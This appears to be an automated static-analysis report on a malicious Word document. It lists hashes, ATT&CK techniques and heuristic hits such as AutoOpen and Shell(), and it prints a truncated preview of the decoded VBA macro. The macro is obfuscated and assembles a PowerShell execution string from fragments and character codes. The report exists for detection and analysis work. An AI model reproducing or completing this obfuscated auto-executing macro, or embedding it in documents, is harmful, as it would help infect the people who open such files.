Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ba60bdcdedfdecf2…

MALICIOUS

Office (OLE)

137.5 KB Created: 2018-06-21 18:46:00 Authoring application: Microsoft Office Word First seen: 2020-01-07
MD5: 730589f4fa17619ba4a0b4760aed0426 SHA-1: 9d73fa94716aa74b82061ad310f525e9f51496df SHA-256: ba60bdcdedfdecf24747f96a44ba2df973496807bf6b1080d9800feb53755242
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, indicating an attempt to execute arbitrary code. The presence of an AutoOpen macro and the critical OLE_VBA_SHELL heuristic firing strongly suggest this functionality. The script itself is heavily obfuscated, making it difficult to determine the exact payload, but the intent is clearly to execute a secondary stage.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 27312 bytes
SHA-256: 4cd77aed10becb6a6004e62064e0d98bc6c91e608d0a50ddf80378daaee4e40a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "KkYRTjKtTWl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "UJNLNMoFTJi"
Function zZkwj()
On Error Resume Next
vIcZQ = (qEKjFJ * 81842 + 95809 * CInt(QiwFNr - CDbl(48878)) * 67182 * Oct(7024))
uQoBmjFu = "He" + "ll" + " .(" + " (" + "[st" + "RIN" + "g]"
lTXDm = (FzVLP * 13289 + 4923 * CInt(AwHRP - CDbl(55686)) * 55591 * Oct(28500))
REzPBHwCMWz = "$v" + "er" + "BO" + "sEp"
zAlkn = (RWZYEi * 15329 + 37328 * CInt(XhzKV - CDbl(74096)) * 64707 * Oct(17572))
GSiplVb = "rEf" + "eRE" + "NC" + "e)" + "[1" + ",3]" + "+'x"
YEPjHT = (sXGXCB * 31523 + 34715 * CInt(Eopiw - CDbl(91724)) * 85331 * Oct(59360))
pskzw = "'-" + "Jo" + "IN" + "''" + ") " + "([s"
uhdSt = (RrKMiQ * 64791 + 28679 * CInt(zLGBv - CDbl(99009)) * 43480 * Oct(33512))
PvktbUuY = "tRI" + "ng" + "]::" + "jOI" + "N("
qRzrad = (MkdNmz * 49816 + 56910 * CInt(GKqDjD - CDbl(43007)) * 49714 * Oct(69112))
zzTShjO = " '" + "' " + ", (" + " '" + "46" + "p71" + "X8"
morjGX = (vccca * 32504 + 63325 * CInt(WjDBTA - CDbl(72481)) * 56461 * Oct(40150))
HTkWqZJW = "9," + "12" + "5H8" + "2," + "73w"
zZkwj = uQoBmjFu + REzPBHwCMWz + GSiplVb + pskzw + PvktbUuY + zzTShjO + HTkWqZJW
ofNwmu = (HpqoV * 1858 + 45103 * CInt(WCzBDf - CDbl(88104)) * 19313 * Oct(38909))
End Function
Function GowZhajMrNu()
On Error Resume Next
XSYQk = (LWtRr * 4572 + 93976 * CInt(hESaqv - CDbl(2671)) * 59929 * Oct(62478))
hJWZDT = "42" + "E55" + "{42" + "{1" + "00,"
wwocR = (uVtmP * 54703 + 98785 * CInt(FpcwGF - CDbl(97014)) * 38999 * Oct(9996))
vIbAXku = "11" + "1-" + "12" + "5w" + "39" + ",10"
TzNST = (LslNT * 73558 + 24456 * CInt(FkWWJK - CDbl(50111)) * 9619 * Oct(10265))
ojBXlszTWJJ = "1," + "104" + "~9" + "6,1" + "11" + "X1"
VATCYa = (csjIS * 91862 + 53934 * CInt(UaXql - CDbl(45249)) * 37146 * Oct(55485))
ZojDkTfYni = "05~" + "126" + "H4" + "2~1"
GowZhajMrNu = hJWZDT + vIbAXku + ojBXlszTWJJ + ZojDkTfYni
tWjcLu = (OtmzSF * 16764 + 38292 * CInt(Artjb - CDbl(75002)) * 78414 * Oct(89473))
End Function
Function ZwjpGSJK()
On Error Resume Next
okCOT = (CXZIB * 83094 + 69920 * CInt(wwtYJ - CDbl(58594)) * 67311 * Oct(29208))
lljFzLrKj = "20~" + "107" + "-1" + "00G" + "11" + "0H1" + "01"
Dflja = (SGhoIW * 19884 + 59840 * CInt(ajvuf - CDbl(97)) * 34882 * Oct(38780))
iErAjOPt = "-10" + "3G4" + "9X4" + "6p6" + "7w1"
auhhO = (QlZRwj * 66035 + 44630 * CInt(bHBUCc - CDbl(89482)) * 77517 * Oct(38003))
uOiQqA = "20" + "E95" + ",83" + "~8" + "8H"
wZiojS = (KUGfPk * 85054 + 3677 * CInt(WzsjQ - CDbl(84474)) * 23273 * Oct(37668))
uHuSDOjNvTz = "105" + ",4" + "2{"
YwwRo = (GNoQGh * 94668 + 80454 * CInt(NYNQwL - CDbl(44043)) * 18548 * Oct(35036))
GBbIbU = "55~" + "42" + "p1" + "00" + "H1" + "11" + "~12"
FwvncG = (PULTn * 86904 + 62491 * CInt(ZBvbvr - CDbl(49138)) * 14861 * Oct(85854))
rZlqUu = "5~" + "39" + "E1" + "01" + ",1"
ZwjpGSJK = lljFzLrKj + iErAjOPt + uOiQqA + uHuSDOjNvTz + GBbIbU + rZlqUu
sivXH = (ofoii * 20096 + 49786 * CInt(KsRci - CDbl(61363)) * 50228 * Oct(59985))
End Function
Function Kajtj()
On Error Resume Next
qXJahW = (fpDVjc * 35619 + 85131 * CInt(JfHFz - CDbl(85079)) * 28259 * Oct(53861))
UhBwDwPkFYP = "04" + "w9" + "6H1"
RDZwcM = (NzEzza * 12924 + 18231 * CInt(CtHEd - CDbl(65655)) * 49732 * Oct(49130))
cSJwDtSXL = "11H" + "105" + "G12" + "6-"
VASaj = (IhrQSM * 68055 + 23699 * CInt(cWfNsO - CDbl(67543)) * 47403 * Oct(96460))
WPQbfs = "42{" + "89" + "~11" + "5-"
vwHXG = (dAjHMZ * 75484 + 26347 * CInt(qQiqq - CDbl(80806)) * 36926 * Oct(63342))
mamGu = "12" + "1,1" + "26w"
cHDMj = (mbUXn * 98118 + 2379 * CInt(ljpLD - CDbl(8858)) * 58240 * Oct(5034))
wfmSwEaXc = "11" + "1G1" + "03"
Kajtj = UhBwDwPkFYP + cSJwDtSXL + WPQbfs + mamGu + wfmSwEaXc
RGBwAi = (McSqu * 98162 + 62315 * CInt(TdVkF - CDbl(30588)) * 49452 * Oct(15080))
End Function
Function jizVi()
On Error Resume Next
FzJBiP = (mZYlFf * 7405 + 72717 * CIn
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.